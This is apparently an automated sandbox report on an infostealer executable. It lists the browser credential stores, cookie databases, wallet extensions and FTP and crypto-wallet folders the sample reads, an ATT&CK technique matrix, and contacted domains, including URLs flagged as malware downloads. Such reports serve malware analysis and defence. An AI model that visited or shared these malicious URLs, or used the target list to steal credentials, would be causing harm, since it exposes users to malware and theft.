              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: Process Memory Space: BDxsBr8Dce.exe PID: 7560, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: BDxsBr8Dce.exe PID: 7560, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B220F0 ?firstSourceLocation@UiObjectBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ,0_2_00B220F0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B201A0 ??0UiArrayBinding@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@PAVUiArrayMemberList@12@@Z,0_2_00B201A0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B22110 ?firstSourceLocation@UiScriptBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ,0_2_00B22110
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B44140 ?accept0@UiScriptBinding@AST@QQmlJS@@UAEXPAVVisitor@23@@Z,0_2_00B44140
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B204F0 ??0UiObjectBinding@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@0PAVUiObjectInitializer@12@@Z,0_2_00B204F0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B226A0 ?lastSourceLocation@UiArrayBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ,0_2_00B226A0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B22830 ?lastSourceLocation@UiObjectBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ,0_2_00B22830
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B20C70 ??0UiScriptBinding@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@PAVStatement@12@@Z,0_2_00B20C70
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00B43BE0 ?accept0@UiArrayBinding@AST@QQmlJS@@UAEXPAVVisitor@23@@Z,0_2_00B43BE0
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              LSASS Memory151
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API
              Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials25
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              BDxsBr8Dce.exe26%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://poweryressz.click/-Control0%Avira URL Cloudsafe
              https://poweryressz.click/apilC0%Avira URL Cloudsafe
              http://www.phreedom.org/md5)08:270%Avira URL Cloudsafe
              http://qt-project.org/xml/features/report-whitespace-only-CharData0%Avira URL Cloudsafe
              https://poweryressz.click/api9v0%Avira URL Cloudsafe
              https://poweryressz.click:443/api-0%Avira URL Cloudsafe
              http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech0%Avira URL Cloudsafe
              https://poweryressz.click/api0%Avira URL Cloudsafe
              http://qt.digia.com/0%Avira URL Cloudsafe
              https://poweryressz.click/0%Avira URL Cloudsafe
              https://poweryressz.click/apih0%Avira URL Cloudsafe
              http://www.phreedom.org/md5)0%Avira URL Cloudsafe
              ftp://.mode0%Avira URL Cloudsafe
              https://kliplorihoe0.shop/int_clp_ldr_pan.txt537.36100%Avira URL Cloudmalware
              https://kliplorihoe0.shop/int_clp_ldr_pan.txtfu100%Avira URL Cloudmalware
              https://slotwang.com/file/SigmaHealth.exe100%Avira URL Cloudmalware
              http://trolltech.com/xml/features/report-start-end-entity0%Avira URL Cloudsafe
              http://qt-project.org/xml/features/report-start-end-entity0%Avira URL Cloudsafe
              https://poweryressz.click/apia0%Avira URL Cloudsafe
              poweryressz.click0%Avira URL Cloudsafe
              http://trolltech.com/xml/features/report-whitespace-only-CharData0%Avira URL Cloudsafe
              https://kliplorihoe0.shop/int_clp_ldr_pan.txt100%Avira URL Cloudmalware
              http://qt.digia.com/Product/Licensing/0%Avira URL Cloudsafe
              http://bugreports.qt.io/Microsoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogicRocketdetected0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              kliplorihoe0.shop
              172.67.182.135
              truefalse
                unknown
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  poweryressz.click
                  172.67.149.196
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    sordid-snaked.cyoufalse
                      high
                      deafeninggeh.bizfalse
                        high
                        https://poweryressz.click/apitrue
                        • Avira URL Cloud: safe
                        unknown
                        diffuculttan.xyzfalse
                          high
                          effecterectz.xyzfalse
                            high
                            wrathful-jammy.cyoufalse
                              high
                              poweryressz.clicktrue
                              • Avira URL Cloud: safe
                              unknown
                              awake-weaves.cyoufalse
                                high
                                immureprech.bizfalse
                                  high
                                  debonairnukk.xyzfalse
                                    high
                                    https://kliplorihoe0.shop/int_clp_ldr_pan.txtfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabBDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://poweryressz.click/api9vBDxsBr8Dce.exe, 00000000.00000003.1708797314.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1670500741.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1692027815.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1668872001.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386339814.00000000047F4000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1668699168.00000000047F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.phreedom.org/md5)08:27BDxsBr8Dce.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ocsp.sectigo.com0BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://poweryressz.click/apilCBDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752392605.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237169586.0000000001D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://crl.microsoftBDxsBr8Dce.exe, 00000000.00000003.1752180305.0000000001D57000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237107985.0000000001D59000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://qt-project.org/xml/features/report-whitespace-only-CharDataBDxsBr8Dce.exefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltechBDxsBr8Dce.exefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://xml.org/sax/features/namespace-prefixesBDxsBr8Dce.exefalse
                                                  high
                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://bugreports.qt.io/BDxsBr8Dce.exefalse
                                                      high
                                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://qt.digia.com/BDxsBr8Dce.exefalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://poweryressz.click/-ControlBDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752367178.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386501646.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237260851.0000000001D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://x1.c.lencr.org/0BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://poweryressz.click:443/api-BDxsBr8Dce.exe, 00000000.00000003.1692106471.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1691967736.0000000001D82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
